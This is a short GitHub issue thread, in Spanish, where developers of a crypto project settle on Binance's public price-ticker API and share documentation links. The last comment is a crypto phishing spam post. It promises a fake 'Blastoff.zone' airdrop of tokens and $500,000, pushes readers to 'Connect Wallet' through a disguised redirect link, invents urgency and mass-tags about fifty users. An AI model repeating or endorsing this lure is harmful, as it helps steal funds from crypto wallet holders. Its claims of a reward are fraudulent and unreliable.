### ISSUE TITLE
Public APIs para precios de crypto

### ISSUE THREAD

**Issue by ligarcia7** [ligarcia7/CryptoPlus#5]
https://github.com/public-apis/public-apis#cryptocurrency

**Comment by pablolospe** [comment]
https://api.binance.com/api/v3/ticker/price

**Comment by ligarcia7** [comment]
La mejor que vimos es la de binance que no hay que autenticarse.

Documentacion: 
https://binance-docs.github.io/apidocs/spot/en/#symbol-price-ticker

Como consumir la API
https://api.binance.com/api/v3/ticker/price

**Comment by pablolospe** [comment]
https://www.youtube.com/watch?v=IAOHydmDrmQ

**Comment by ligarcia7** [comment]
Done

**Comment by schopedotco** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
shocker1185, @CharlieKanG0, @kimteespk, @vtb2000, @otomay, @Tobel158, @vehbibenli, @vzhang90, @berkerlogoglu, @MadAboutProgramming, @mahajanankur, @jccarrigan, @richcoder221, @vagi, @caifengsteven, @OdinLin, @wesyoung, @r4ds3c, @meowmeow69420, @trampliu, @bflammers, @jdmogollonp, @MountainLark, @dahebolangkuan, @finel, @andeen171, @Shrhawk, @deveyu, @thinhhuynh, @puterhimself, @zloynemec, @kmuffato, @rparkpkcap, @haftnerb, @masaki345, @AnLoMinus, @fedeoppi, @blendedin, @moitoi, @sudawg, @john523, @Jordanm37, @Xylem-066, @Arthurr00, @cesarmarinhorj, @ninjatechdev, @alexdoncea, @altSeneca, @kerlui, @HuWenhai
